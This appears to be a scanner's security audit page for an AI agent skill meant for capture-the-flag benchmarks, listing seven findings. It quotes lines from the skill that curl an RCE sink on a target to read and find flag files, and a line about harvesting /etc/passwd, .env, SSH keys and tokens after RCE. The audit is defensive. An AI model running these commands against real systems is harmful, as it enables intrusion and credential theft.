benchmark
Facilitates flag capture in benchmark mode for engagement objectives, utilizing specific commands and context for effective execution.
Security score: 53/100
The benchmark skill was audited on Jun 8, 2026 and we found 7 security issues across 3 threat categories, including 1 critical. Review the findings below before installing.
Categories Tested
Security Issues
medium line 52
Curl to non-GitHub URL
Source: SKILL.md
| 52 | result=$(curl -s "http://<TARGET>/<RCE_SINK>?cmd=cat+$f" 2>/dev/null | head -5) |
medium line 58
Curl to non-GitHub URL
Source: SKILL.md
| 58 | curl -s "http://<TARGET>/<RCE_SINK>?cmd=find+/+-type+f+\(-name+'flag*'-o+-name+'FLAG*'\)+-not+-path+'/proc/*'+-not+-path+'/sys/*'+2>/dev/null" \ |
critical line 69
Access to /etc/passwd
Source: SKILL.md
| 69 | The generic credential harvest (`/etc/passwd`, `.env`, configs, SSH keys, secret/cred/token files) lives in `/skills/standard/exploit/web/command-injection/SKILL.md` — run BOTH sweeps post-RCE; flag-p |
medium line 49
Access to root home directory
Source: SKILL.md
| 49 | for f in /opt/flag.txt /flag /flag.txt /root/flag.txt /root/flag \ |
medium line 69
Access to .env file
Source: SKILL.md
| 69 | The generic credential harvest (`/etc/passwd`, `.env`, configs, SSH keys, secret/cred/token files) lives in `/skills/standard/exploit/web/command-injection/SKILL.md` — run BOTH sweeps post-RCE; flag-p |
low line 52
External URL reference
Source: SKILL.md
| 52 | result=$(curl -s "http://<TARGET>/<RCE_SINK>?cmd=cat+$f" 2>/dev/null | head -5) |
low line 58
External URL reference
Source: SKILL.md
| 58 | curl -s "http://<TARGET>/<RCE_SINK>?cmd=find+/+-type+f+\(-name+'flag*'-o+-name+'FLAG*'\)+-not+-path+'/proc/*'+-not+-path+'/sys/*'+2>/dev/null" \ |
Scanned on Jun 8, 2026